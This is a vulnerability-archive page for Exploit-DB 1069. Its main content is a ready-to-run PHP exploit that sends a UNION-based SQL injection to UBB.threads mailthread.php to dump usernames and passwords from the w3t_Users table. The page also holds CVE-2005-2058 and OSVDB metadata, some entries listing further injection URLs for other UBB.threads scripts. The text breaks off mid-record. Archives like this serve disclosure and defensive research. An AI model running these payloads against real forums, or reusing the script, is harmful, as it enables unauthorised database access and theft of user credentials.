Search...

UBB Threads < 6.5.2 Beta mailthread.php SQL Injection Exploit

2005-06-25T00:00:00

ID EDB-ID:1069
Type exploitdb
Reporter mh_p0rtal
Modified 2005-06-25T00:00:00

Description

UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit. CVE-2005-2058. Webapps exploit for php platform

                                        
                                            &lt;?php
#############################################################################
#      T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
#############################################################################
# Vulnerable:   UBBCentral SQL Injection
#
# Exploit By :  MH_p0rtal
#
# Discovered By: James Bercegay
#############################################################################
#  Gr33tz To ==&gt;   Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#
#  And Iranian Hacking & Security Teams :
#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,
#  Crouz Security Team  & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
#############################################################################
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if ((  $dirs[$ab] == "/" )  &&  ( $dirs[$ac] == "/" ))   {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {

echo "Can't Connect\n";
} else {
   $mh = "GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat  HTTP/1.1\r\n";
   $mh .= "Host: $url\r\n";
   $mh .= "Connection: Close\r\n\r\n";

  fwrite($fc, $mh);
  while (!feof($fc)) {
  echo fgets($fc, 1024);
  }
   fclose($fc);
}
} else {
echo " Your pattern doesn't equal with Exploit directory pattern ";
}
?&gt;

# milw0rm.com [2005-06-25]

JSON Vulners Source

Initial Source

{"hash": "102b72a8e5bd344b37a81ce12290bc2e383751e738368768600bea9660b8e280", "id": "EDB-ID:1069", "lastseen": "2016-01-31T13:29:18", "enchantments": {"vulnersScore": 7.5}, "bulletinFamily": "exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "edition": 1, "history": [], "type": "exploitdb", "sourceHref": "https://www.exploit-db.com/download/1069/", "description": "UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit. CVE-2005-2058. Webapps exploit for php platform", "title": "UBB Threads < 6.5.2 Beta mailthread.php SQL Injection Exploit", "sourceData": "<?php\r\n#############################################################################\r\n# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m\r\n#############################################################################\r\n# Vulnerable: UBBCentral SQL Injection\r\n#\r\n# Exploit By : MH_p0rtal\r\n#\r\n# Discovered By: James Bercegay\r\n#############################################################################\r\n# Gr33tz To ==> Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke\r\n#\r\n# And Iranian Hacking & Security Teams :\r\n# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,\r\n# Crouz Security Team & Simorgh-ev Security Team\r\n#############################################################################\r\n# ___________Config :\r\n# please replace your address :\r\n$url = \"http:///www.example.com\";\r\n# please replace your dir address :\r\n$dirs = \"/dir/to/ubbt/\";\r\n# __________End Config\r\n#############################################################################\r\n$aa = strlen ( $dirs );\r\n$ab = $aa - 1;\r\n$ac = 0;\r\nif (( $dirs[$ab] == \"/\" ) && ( $dirs[$ac] == \"/\" )) {\r\n$merg = $dirs.mailthread.php;\r\n$fc = fsockopen(\"$url\", 80, $errno, $errstr, 30);\r\nif (!$fc) {\r\n\r\necho \"Can't Connect\\n\";\r\n} else {\r\n $mh = \"GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat HTTP/1.1\\r\\n\";\r\n $mh .= \"Host: $url\\r\\n\";\r\n $mh .= \"Connection: Close\\r\\n\\r\\n\";\r\n\r\n fwrite($fc, $mh);\r\n while (!feof($fc)) {\r\n echo fgets($fc, 1024);\r\n }\r\n fclose($fc);\r\n}\r\n} else {\r\necho \" Your pattern doesn't equal with Exploit directory pattern \";\r\n}\r\n?>\n\n# milw0rm.com [2005-06-25]\n", "objectVersion": "1.0", "cvelist": ["CVE-2005-2058"], "published": "2005-06-25T00:00:00", "osvdbidlist": ["17528"], "references": [], "reporter": "mh_p0rtal", "modified": "2005-06-25T00:00:00", "href": "https://www.exploit-db.com/exploits/1069/"}

{"result": {"cve": [{"id": "CVE-2005-2058", "type": "cve", "title": "CVE-2005-2058", "description": "Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number parameter to (1) download.php, (2) modifypost.php, (3) mailthread.php, or (4) notifymod.php, (5) month or (6) year parameter to calendar.php, (7) message parameter to viewmessage.php, (8) main parameter to addfav.php, or (9) posted parameter to grabnext.php.", "published": "2005-06-29T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2058", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-18T15:51:15"}], "exploitdb": [{"id": "EDB-ID:25902", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x notifymod.php Number Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x notifymod.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25902/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:25:13"}, {"id": "EDB-ID:25900", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x viewmessage.php message Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x viewmessage.php message Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25900/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:24:56"}, {"id": "EDB-ID:25899", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x modifypost.php Number Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x modifypost.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25899/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:24:48"}, {"id": "EDB-ID:25898", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x calendar.php Multiple Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x calendar.php Multiple Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25898/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:24:39"}, {"id": "EDB-ID:25901", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x addfav.php main Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x addfav.php main Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25901/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:25:04"}, {"id": "EDB-ID:25897", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x download.php Number Parameter SQL Injection", "description": "UBBCentral UBB.threads 5.5.1/6.x download.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25897/", "cvelist": ["CVE-2005-2058"], "lastseen": "2016-02-03T02:24:30"}], "osvdb": [{"id": "OSVDB:17528", "type": "osvdb", "title": "UBB.threads mailthread.php Number Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'mailthread.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'mailthread.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/mailthread.php?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17528", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17533", "type": "osvdb", "title": "UBB.threads Rating System Main Parameter SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'Rating System' not properly sanitizing user-supplied input to the 'Main' parameter. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'Rating System' not properly sanitizing user-supplied input to the 'Main' parameter. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17533", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17532", "type": "osvdb", "title": "UBB.threads grabnext.php posted Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'grabnext.php' script not properly sanitizing user-supplied input to the 'posted' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'grabnext.php' script not properly sanitizing user-supplied input to the 'posted' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/grabnext.php?Cat=4&Board=UBB23&mode=showflat&sticky=0&dir=old&posted=1045942715[SQL]\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17532", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17525", "type": "osvdb", "title": "UBB.threads download.php Number Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'download.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'download.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/download.php?Number=42227[SQL]\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\nFrSIRT Advisory: ADV-2005-0875\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17525", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17526", "type": "osvdb", "title": "UBB.threads calendar.php Multiple Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'calendar.php' script not properly sanitizing user-supplied input to the 'year' or 'month' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'calendar.php' script not properly sanitizing user-supplied input to the 'year' or 'month' variables. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/calendar.php?Cat=7&month=6&year=2005[SQL]\nhttp://[victim]/calendar.php?Cat=&month=7[SQL]&year=2005\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17526", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17527", "type": "osvdb", "title": "UBB.threads modifypost.php Number Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'modifypost.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'modifypost.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup\n&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17527", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17529", "type": "osvdb", "title": "UBB.threads viewmessage.php message Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewmessage.php' script not properly sanitizing user-supplied input to the 'message' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewmessage.php' script not properly sanitizing user-supplied input to the 'message' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nOther Advisory URL: http://www.cyberlords.net/advisories/cl_ubb.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "published": "2005-06-23T05:15:28", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:17529", "cvelist": ["CVE-2005-2058"], "lastseen": "2017-04-28T13:20:13"}, {"id": "OSVDB:17530", "type": "osvdb", "title": "UBB.threads addfav.php main Variable SQL Injection", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'addfav.php' script not properly sanitizing user-supplied input to the 'main' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'addfav.php' script not properly sanitizing user-supplied input to the 'main' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related 